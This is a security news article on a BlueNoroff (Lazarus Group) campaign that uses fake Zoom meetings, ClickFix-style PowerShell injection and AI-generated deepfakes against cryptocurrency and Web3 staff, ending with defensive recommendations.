A sophisticated cyber attack from North Korea’s Lazarus Group, specifically the BlueNoroff subgroup, is targeting cryptocurrency and Web3 professionals. This campaign uses a combination of fake Zoom meeting interfaces, fileless PowerShell scripts, and AI-generated deepfake content.
BlueNoroff’s Techniques and Targets
BlueNoroff, known for its focus on financial gain through digital asset theft, has launched attacks in over 20 countries, with the United States accounting for 41% of the victims. The group’s strategy involves spear-phishing emails where attackers pose as legal professionals from the Fintech sector, inviting targets to a meeting via Calendly.
Upon confirming the meeting, the genuine Google Meet link is replaced with a fake Zoom URL that closely mimics the real one. Victims are led to a deceptive HTML page mimicking the Zoom interface, complete with artificial participant videos and speaker indicators.
Execution and Impact of the Attacks
Arctic Wolf analysts have traced a specific attack on a North American Web3 company back to BlueNoroff. This attack, attributed to APT38, also known as Sapphire Sleet or Stardust Chollima, quickly compromises systems within minutes. The attackers maintain access for over two months, obtaining sensitive information like browser credentials and webcam footage, which are then used to craft more convincing lures.
The campaign stands out due to its use of a self-sustaining deepfake production system. Researchers found nearly 950 files on the attackers’ server, including AI-generated images and deepfake videos, all verified through cryptographic metadata as outputs from OpenAI’s GPT-4o model.
Protective Measures and Recommendations
Victims of these attacks often unknowingly participate in a ClickFix-style clipboard injection attack. During the fake Zoom meeting, users are prompted to update their SDK, leading to the execution of hidden PowerShell commands. These commands install a persistent beacon that communicates with the attackers’ server every five seconds, gathering extensive system data.
Organizations involved in Web3, cryptocurrency, and financial services are advised to verify meeting links through secondary means before joining. It’s crucial to remember that legitimate platforms don’t require terminal commands for resolving audio or camera issues. Security teams should block identified C2 addresses, remove suspicious shortcuts, and rotate any exposed credentials.
Enabling PowerShell Script Block Logging on endpoints can help in the early detection of such obfuscated payloads. Immediate action is necessary to secure sensitive information and prevent future breaches.
